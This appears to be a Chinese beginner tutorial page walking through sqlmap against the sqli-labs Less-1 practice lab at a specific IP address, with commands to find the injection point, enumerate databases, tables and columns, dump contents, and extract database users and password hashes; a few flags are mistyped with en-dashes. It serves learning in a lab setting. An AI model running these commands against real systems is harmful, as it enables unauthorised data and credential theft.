织梦狗教程 / 编程教程 / 数据库 / 正文

SQL注入之sqlmap入门学习

织梦狗教程数据库

2023-07-30

本文主要介绍了SQL注入之sqlmap入门学习，文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值，需要的朋友们下面随着小编来一起学习学习吧

目录

一、判断是否存在注入点
二、查询当前用户下所有数据库
三、获取数据库中的表名
四、获取表中的字段名
五、获取字段内容
六、获取数据库的所有用户
七、获取数据库用户的密码
八、获取当前网站数据库的名称
九、获取当前网站数据库的用户名称

原来sql注入如此简单

以SQL注入靶场sqli-labs第一关为例，进行sqlmap工具的使用分享。

一、判断是否存在注入点

使用命令：

使用命令：sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"

有图中白色背景的则判断出有注入点

二、查询当前用户下所有数据库

使用命令：

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs

可以看到有五个表

三、获取数据库中的表名

选取一个challenges数据库，获取此库的表名

使用命令：

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables

四、获取表中的字段名

选取表T5M0QG6FM2，获取其中字段名

使用命令：

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、获取字段内容

使用命令：

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、获取数据库的所有用户

使用命令：

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users

使用该命令就可以列出所有管理用户

七、获取数据库用户的密码

使用命令：

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、获取当前网站数据库的名称

使用命令：

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到当前的数据库是 security

九、获取当前网站数据库的用户名称

使用命令：

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user

当前用户是root

到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了,更多相关sqlmap入门内容请搜索编程学习网以前的文章希望大家以后多多支持编程学习网！

织梦狗教程

本文标题为：SQL注入之sqlmap入门学习

上一篇： SQL Server数据库判断最近一次的备份执行结果(最新推荐)

下一篇： Row_number()函数用法小结

基础教程推荐

学习Bootstrap5

猜你喜欢

Windows10系统中Oracle完全卸载正确步骤 2023-07-24
Python安装第三方库的方法(pip/conda、easy_install、setup.py) 2023-07-28
oracle数据库排序后如何获取第一条数据 2023-07-24
redis 数据库 2023-09-13
Java程序员从笨鸟到菜鸟（五十三）分布式之 Redis 2023-09-11
oracle19c卸载教程的超详细教程 2023-07-23
SQL Server如何设置用户只能访问特定数据库和访问特定表或视图 2023-07-29
Python常见库matplotlib学习笔记之画图中各个模块的含义及修改方法 2023-07-27
redis乐观锁与悲观锁的实战 2023-07-13
Mariadb数据库主从复制同步配置过程实例 2023-07-25